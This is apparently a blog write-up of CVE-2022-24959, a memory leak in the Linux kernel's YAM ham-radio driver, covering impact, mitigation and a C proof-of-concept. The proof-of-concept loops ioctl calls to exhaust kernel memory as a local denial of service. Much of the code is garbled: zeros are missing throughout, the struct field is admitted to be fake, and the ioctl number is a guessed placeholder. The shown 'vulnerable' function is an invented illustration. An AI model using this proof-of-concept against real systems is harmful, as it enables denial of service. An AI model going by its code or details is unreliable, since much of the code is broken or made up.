In early 2022, a security vulnerability, tracked as CVE-2022-24959, was identified in the Linux kernel's hamradio subsystem. More specifically, this issue lives in the yam_siocdevprivate function within drivers/net/hamradio/yam.c. The problem? A memory leak that can be triggered locally, impacting systems running Linux kernel versions *before* 5.16.5.
Let’s break down what this means, see how the code works, explore how an attacker might exploit it, and walk through practical details not often covered elsewhere.
What is YAM and Where Is the Issue?
The YAM driver is a protocol used by amateur radio (“ham radio”) operators. Not commonly used today, but vulnerable code often lurks in old drivers that no one’s watching closely.
The vulnerability is a memory leak—the kernel allocates memory via kmalloc but forgets to free it under certain error situations.
Diving into the Source: Vulnerable Code
The commit that fixed this issue is visible here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3b1c35e559dcddddb96fba9e993ddeebb317c50
The bug lives in this function
static int yam_siocdevprivate(struct net_device *dev, struct ifreq *ifr)
{
struct yamdrv_ioctl_cfg *yic = kmalloc(sizeof(struct yamdrv_ioctl_cfg), GFP_KERNEL);
if (!yic)
return -ENOMEM;
if (copy_from_user(yic, ifr->ifr_data, sizeof(struct yamdrv_ioctl_cfg))) {
kfree(yic);
return -EFAULT;
}
// ... other logic omitted for readability
// sometimes, if an error occurs later, kfree(yic) is missing!
if (something_wrong) {
return -EINVAL; // yic is *never* freed here
}
// finally, in other flows, it's freed:
kfree(yic);
return ;
}
Key problem: In some error branches, kfree(yic) is *forgotten*, leading to a memory leak.
Understanding the Impact
- Memory leak: Each time a user triggers this ioctl with certain (intentionally bad) arguments, the kernel allocates memory and never frees it.
- Privilege Required: Triggering this requires the ability to open the YAM network device and issue ioctls. This usually means local access, but not necessarily root.
- Denial-of-Service: Repeatedly exploiting the leak can eat up kernel memory (kmalloc-64), making the OS unstable or eventually unusable as it runs out of memory.
Reference Links
- Original Red Hat bug: https://bugzilla.redhat.com/show_bug.cgi?id=2052068
- Patch: https://lore.kernel.org/lkml/20220129175122.23504-1-masahiroy@kernel.org/
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2022-24959
The YAM module is loaded (test with lsmod | grep yam).
- You have permissions to open "/dev/yam".
PoC Example (C Language)
// yam-leak.c: proof of memory leak for CVE-2022-24959
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#define YAM_IOCTL_MAGIC xF5U // not always required; ioctl number is what matters
struct yamdrv_ioctl_cfg {
int some_field; // fake field; actual struct may differ!
};
int main() {
int fd = open("/dev/yam", O_RDWR);
if (fd < ) {
perror("open yam");
return 1;
}
struct yamdrv_ioctl_cfg cfg;
memset(&cfg, x41, sizeof(cfg));
// Use the actual private ioctl number (check via code or 'include/uapi/linux/hamradio.h')
#define SIOCSIFADDR x8916 // example; change to the actual one for YAM siocdevprivate
for (int i = ; i < 100000; i++) {
// This will trigger the vulnerable path;
// You may need to adjust cmd, or cfg as per your kernel version
if (ioctl(fd, SIOCSIFADDR, &cfg) < ) {
// We *want* this to fail!
}
}
close(fd);
return ;
}
Note:
By running this in a loop, it will keep allocating kernel memory and never free it.
- Try to observe slabtop as kernel memory usage grows abnormally (look for “kmalloc-64” or similar slabs).
How Do I Fix or Mitigate?
- Update your kernel to version 5.16.5 or later (or to a distribution-provided kernel that backported the fix).
Unload the YAM driver if not needed: rmmod yam
- Restrict access: Limit permissions or remove /dev/yam* if not in use.
Conclusion
CVE-2022-24959 is a typical example of how legacy or niche device drivers in the kernel can harbor simple but impactful vulnerabilities. Even though few people use amateur radio networking, the presence of such drivers on production systems (especially in distros with “everything enabled”) still exposes you to kernel memory exhaustion attacks.
Always keep your kernel up-to-date, remove or blacklist drivers you don’t need, and audit rarely-used legacy code.
Commit fixing the issue:
CVE Details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24959
Linux Hamradio Documentation:
https://www.kernel.org/doc/html/latest/networking/hamradio.html
Remember: Even small leaks can sink big ships.
Patch early, patch often!
Timeline
Published on: 02/11/2022 06:15:00 UTC
Last modified on: 05/11/2022 14:44:00 UTC